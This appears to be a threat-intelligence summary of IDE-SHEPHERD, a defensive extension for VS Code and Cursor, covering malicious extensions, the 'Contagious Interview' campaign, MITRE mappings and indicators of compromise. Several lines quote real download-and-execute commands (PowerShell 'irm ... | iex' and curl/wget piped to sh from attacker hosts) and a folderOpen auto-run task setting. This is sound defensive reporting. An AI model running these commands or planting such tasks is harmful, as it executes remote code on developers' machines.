Introducing IDE-SHEPHERD: Your shield against threat actors lurking in your IDE

Modern IDEs like VS Code and Cursor rely on a trust-based model that grants extensions and trusted workspaces full user-level privileges, enabling malicious extensions or workspace files to execute arbitrary code and spawn hidden network connections. IDE-SHEPHERD is an open-source extension that injects into the extension-host Node.js runtime to intercept dangerous APIs (child_process, http, https), block malicious operations (PowerShell execution, remote downloads, auto-run tasks), and provide runtime and heuristic defenses to mitigate attacks such as the “Contagious Interview” campaign and marketplace-based compromises. #IDE-SHEPHERD #ContagiousInterview

Keypoints

VS Code and Cursor use a trust model that, once trust is granted, allows extensions and trusted workspaces to run arbitrary code with full access to workspace files and IDE APIs.
Threat actors have abused this model via malicious extensions and workspace files (e.g., tasks.json) to perform remote code execution, data exfiltration, and cryptomining (examples: TigerJack, Solidity, “Contagious Interview”).
Attackers evade static marketplace checks using obfuscation, staged payloads, delayed execution, and renaming techniques to bypass delisted-extension safeguards.
IDE-SHEPHERD integrates into the extension host Node.js runtime with a require-in-the-middle patch to intercept child_process, HTTP(S), and task execution early during IDE startup.
Runtime defenses block suspicious process executions (PowerShell, hidden commands), network connections to known malicious domains, and auto-running workspace tasks before they execute.
Heuristic scanning analyzes extension metadata for anomalies (missing repository links, suspicious version numbers, wildcard activation, obfuscation) and surfaces risk scores and events in a sidebar UI.
IDE-SHEPHERD provides developer logs and optional Datadog telemetry, maintains audit trails of blocked operations, and invites community contributions to extend detection rules.

MITRE Techniques

[T1059.001 ] PowerShell – Used to execute remote scripts via child_process.exec, enabling remote code execution with hidden flags (‘exec(“powershell -WindowStyle Hidden -Command “irm https://niggboo.com/aaa | iex””‘, blocked by IDE-SHEPHERD).
[T1105 ] Ingress Tool Transfer – Adversaries download remote payloads and scripts using curl/wget from attacker-controlled servers as part of task execution (‘curl “https://vscode-setup[.]vercel[.]app/settings/mac?flag=1 | sh”‘, ‘wget -qO- “https://vscode-setup[.]vercel[.]app/settings/linux?flag=1” | sh’).
[T1027 ] Obfuscated Files or Information – Attackers obfuscate extension code (obfuscator.io) to evade static analysis and reviewer scrutiny (‘The code is obfuscated using obfuscator.io, which limits static scanners’ insight into code behavior.’).
[T1204 ] User Execution – Workspace trust and auto-run-on-folder-open behavior cause users to implicitly execute malicious tasks when trusting a repository (‘”runOptions”: { “runOn”: “folderOpen” }’ leading to silent execution when the workspace is trusted).
[T1071 ] Application Layer Protocol – Extensions and workspaces open outbound HTTP/HTTPS connections and websockets for payload retrieval and exfiltration, monitored by IDE-SHEPHERD (‘Hooks HTTP/HTTPS request libraries to monitor all outbound connections’ and ‘open websockets in the background’).
[T1041 ] Exfiltration Over Command and Control Channel – Malicious extensions and campaigns exfiltrate data to attacker domains and download additional payloads (‘hostile extensions exfiltrate data or execute cryptomining payloads’).

Indicators of Compromise

[Domain ] malicious payload/C2 domains – niggboo.com, vscode-setup.vercel.app, and 3 more domains mentioned (JuanFBlanco.awswhh, VitalikButerin-EthFoundation.blan-co, ShowSnowcrypto.SnowShoNo).
[File name ] workspace/task files used to auto-execute – .vscode/tasks.json (example: task with runOn: “folderOpen”), package.json (renamed to bypass delisting protections).
[Extension identifier ] malicious or delisted extensions – juanfblanco.awshh (removed from marketplace), juanfblanco.awshh vsix bypass example.
[Command ] suspicious command lines used to fetch and execute code – powershell -WindowStyle Hidden -Command “irm https://niggboo.com/aaa | iex”, curl ‘https://vscode-setup[.]vercel[.]app/settings/mac?flag=1 | sh’.
[Log entry ] blocked operation audit trail – ‘2025-12-08 10:28:13.712 [info] [WARN] Child-Process Plugin: blocked exec(): powershell -WindowStyle Hidden -Command “irm https://niggboo[.]com/aaa | iex”‘.